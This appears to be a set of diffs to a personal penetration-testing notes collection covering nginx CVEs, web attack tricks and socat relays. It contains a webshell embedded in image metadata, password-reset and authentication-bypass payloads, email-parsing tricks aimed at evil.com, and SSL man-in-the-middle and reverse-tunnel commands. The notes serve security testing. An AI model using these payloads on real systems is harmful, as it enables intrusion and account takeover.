Nx

nginx

@@ -12,10 +12,15 @@ $ exiftool "-comment<=shell.php" malicious.png # use strings to make sure all's
 http://blah/uploads/136991823.png/webshell.php?1=uname+-a
 
 # vulns
-* Request line parsing vulnerability (CVE-2013-4547)
+* request line parsing vulnerability CVE-2013-4547
 http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html
 nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
 
-* (CVE-2013-2070)
+* memory disclosure CVE-2013-2070
 http://mailman.nginx.org/pipermail/nginx-announce/2013/000114.html
-A memory disclosure vulnerability is present in nginx versions 1.1.4 to 1.2.8 and 1.3.0 to 1.4.0. The vulnerability is present if proxy_pass to untrusted upstream HTTP servers is used.  The vulnerability could also lead to a denial of service.
+nginx versions 1.1.4 to 1.2.8 and 1.3.0 to 1.4.0, vulnerable if proxy_pass to untrusted upstream HTTP servers is used
+
+* resolver CVE-2021-23017
+https://x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
+https://distinctplace.com/2017/04/19/nginx-resolver-explained/
+https://medium.com/driven-by-code/dynamic-dns-resolution-in-nginx-22133c22e3ab

pentest

@@ -20,6 +20,7 @@ https://github.com/qazbnm456/awesome-web-security
 https://github.com/enaqx/awesome-pentest
 https://github.com/sbilly/awesome-security
 https://github.com/rmusser01/Infosec_Reference
+https://github.com/payloadbox/
 
 # old
 http://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
@@ -134,11 +135,12 @@ [email protected]@legit.com https://nathandavison.com/blog/exploiting-email-address-pa
 me([email protected])@evil.com <- email comment
 array: [email protected]&[email protected]
 
-* reset forgot pw
+* password reset
 mysql 1="1abc" is true and 0="abc" is true so request /reset?token=0 http://phrack.org/issues/69/12.html
 reset token is NULL in db by default so request ?reset_token=%00 - opencfp bug http://haxx.ml/post/149975211631/how-i-hacked-your-cfp-and-probably-some-other
 send more than one reset password request at the same time, or http pipeline multiple requests (dont update `Content-Length` or send `Connection: close`)
 integer key truncation like php in 2015, send id of 4294967296: var_dump([0 => 0] === [0x100000000 => 0]); => bool(true) https://bugs.php.net/bug.php?id=69892
+poisoning https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
 
 * authentication bypass
 /activate/?activation_code= -> SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1 # login w/o password as the first account

socat

@@ -19,14 +19,8 @@ openssl s_client -connect 1.2.3.4:443 -ign_eof -quiet -sess_out ssl_session.ctx
 socat -d TCP4-L:9090,reuseaddr,fork exec:'openssl s_client -host 1.2.3.4 -port 443 -ign_eof -quiet -sess_in ssl_session.ctx' 2>/dev/null
 ./wfuzz.py -c -z file -f ~/dico.txt --basic 'manager:FUZZ' --hc 401 http://127.0.0.1:9090/manager/html/
 
-# loggue les requetes HTTP et retourne une reponse HTTP statique
-socat TCP-LISTEN:80,fork,reuseaddr EXEC:'path/to/httplogger.py'
-socat openssl-listen:443,fork,reuseaddr,verify=0,cert=path/to/cert+key.pem EXEC:'path/to/httplogger.py' (verify=1 -> certificat client obligatoire)
-
 # sslmitm
-socat -v openssl-listen:8081,fork,reuseaddr,cert=cert.pem,key=key.pem,verify=0 tcp:127.0.0.1:3306
-socat -v tcp-l:3306,reuseaddr,fork openssl:1.2.3.4:443,verify=0
-/etc/init.d/dnsmasq start && less +F /tmp/dnsmasq.log
+socat -v openssl-listen:8081,fork,reuseaddr,cert=localhost.pem,verify=0 openssl:1.2.3.4:443,verify=0
 
 # reverse socat to bf local services
 clt: socat -d tcp:mabox:1234,fork,interval=1,forever tcp:127.0.0.1:445